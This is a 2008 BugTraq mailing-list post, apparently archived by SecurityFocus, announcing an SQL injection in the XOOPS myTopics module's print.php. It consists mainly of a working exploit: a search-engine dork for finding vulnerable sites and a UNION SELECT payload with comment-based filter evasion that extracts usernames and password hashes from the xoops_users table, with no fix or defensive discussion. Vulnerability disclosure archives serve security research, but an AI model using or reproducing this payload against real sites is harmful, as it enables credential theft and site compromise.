BugTraq
XOOPS Module myTopics-print SQL Injection(articleid) Feb 18 2008 05:18PM
hackturkiye hackturkiye gmail com
###############################################################

#

# XOOPS Module myTopics-print SQL Injection(articleid)

#

###############################################################

#

# AUTHOR : S@BUN

#

# HOME 1 : http://www.milw0rm.com/author/1334

#

# MAİL : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

################################################################

#

# DORK 1 : allinurl: "/modules/myTopics/"

#

# you can add expliot after mytopics

#

################################################################

example

/modules/myTopics/ (exploit)

EXPLOIT :

print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),
0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,
0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops
_users/*%20where%20admin%201%200%201%20

################################################################

# S@BUN i AM NOT HACKER S@BUN

################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus